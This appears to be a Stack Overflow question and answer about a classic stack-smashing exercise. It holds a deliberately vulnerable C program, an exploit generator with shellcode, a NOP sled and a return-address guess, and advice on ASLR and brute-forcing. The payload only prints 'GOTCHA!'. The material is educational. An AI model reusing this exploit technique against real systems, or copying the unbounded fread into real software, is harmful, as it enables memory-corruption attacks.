# C overflows need some direction

Tags: c, security, buffer, buffer-overflow

I have 2 programs that I'm trying to do some stack smashing with.

vuln.c

```
#include <stdlib.h>
#include <stdio.h>
int bof()
{
    char buffer[8];
    FILE *badfile;
    badfile = fopen( "badfile", "r" );
    fread( buffer, sizeof( char ), 1024, badfile );
    return 1;
}

int main( int argc, char **argv)
{
    bof();
    printf("Not gonna do it! \n");
    return 1;
}
```

exploit.c

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
 "\xeb\x16"
 "\x31\xdb"
 "\x31\xd2"
 "\x31\xc0"
 "\x59"
 "\xbb\x01\x00\x00\x00"
 "\xb2\x09"
 "\xb0\x04"
 "\xcd\x80"
 "\xb0\x01"
 "\xcd\x80"
 "xe8\xe5\xff\xff\xff"
 "GOTCHA!\n";

#define OFFSET 1500

    int bof()
    {
       char buffer[8];
       strcpy(buffer, "AAAAAAAAA");
       return 1;
    }

    unsigned long get_ESP(void)
    {
          __asm__("movl %ESP,%EAX");
    }

    int main(int argc, char **argv)
    {
      unsigned int addr;
      FILE *badfile;
      char buffer[1024];
      addr = get_ESP()+OFFSET;
      fprintf(stderr, "Using Offset: 0x%x\nShell code size: %lx\n",addr, sizeof(shellcode));
      memset(&buffer, 0x90, 1024);
      buffer[12] = addr & 0x000000ff;
      buffer[13] = (addr & 0x0000ff00) >> 8;
      buffer[14] = (addr & 0x00ff0000) >> 16;
      buffer[15] = (addr & 0xff000000) >> 24;
      memcpy( &buffer[ (sizeof(buffer) - sizeof(shellcode)) ], shellcode,sizeof(shellcode) );
      badfile = fopen("./badfile","w");
      fwrite(buffer,1024,1,badfile);
      fclose(badfile);

    }
```

I compiled this on my Macbook with these commands, `gcc vuln.c -fno-stack-protector -o vuln` and `gcc exploit.c -fno-stack-protector -o exploit`. I then run vuln, and it runs fine, then exploit and get this output:

```
Using Offset: 0x6acd6814
Shell code size: 28
```

I then corrupt the file with `od -t x2 badfile`, so it ends up looking like this:

```
bash-3.2# cat badfile
????????????h?j?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?1?1?Y??   ?̀?̀xe8????GOTCHA!
```

I'm trying to get the exploit the vuln program so it prints GOTCHA! I am right now getting `Bus error: 10`. Could anyone give me a hint on where I'm going wrong?

__*_*__*_*__*_*__*_*__*_*__*_*__*_*__*_*_*update****_*__*_*__*_*_**

I tried this same procedure with BT5. using `echo 0 > /proc/sys/kernel/randomize_va_space` to disable ASLR.

I still can't figure out why this doesn't work. I get this when running in gdb:

```
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb)
```

Am I attempting this correctly?

Comment: Step through the code using the debugger.  This should help you see exactly where in your code the bus error is occurring.

Comment: Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: 13 at address: 0x0000000000000000
0x0000000100000e89 in bof ()

Comment: Modern operating systems do ASLR (Address Space Layout Randomization).  Which means the stack is not at the same offset in the exploit and the vuln executables.  You'll need to turn off ASLR or use an old OS (like Linux 2.4 with no ASLR patches) for this code to work.

Comment: @atrueresistance- If you use the `-g` option when you compile, you'll get debugging information that will make the interface and output of `gdb` much more helpful.  It should allow you to trace the error back to a specific line of C code.

Comment: @atrueresistance - It looks like you're smashing the stack, but the placement is off and so your nop-sled is the return address rather than the address you actually want.  I might guess that you need to target locations 16 to 19 in your buffer to account for a return value.

Answer (score 1, accepted):

I'm not sure what kind of protection OSX has - it's possible this will work better on a Linux box.

Anyway, the basic idea looks alright - your vulnerable program opens a large file and dumps it into a tiny array.  The problem appears to be your file creation.

When you get ESP, you're getting the stack pointer of the current program.  That has no bearing on the vulnerable program unless the stack is setup exactly the same in both (which it's not).

What might work better is actually executing the vulnerable program in gdb until you hit bof() and looking at the stack pointer then.  If that's consistent, then you win.  If it's randomized (which my guess is that it is), then you're going to need to use your nop-sled and hope.

On a 32-bit machine, the stack randomization isn't too much that repeatedly attempting the exploit should eventually get you a successful attack.

Good luck!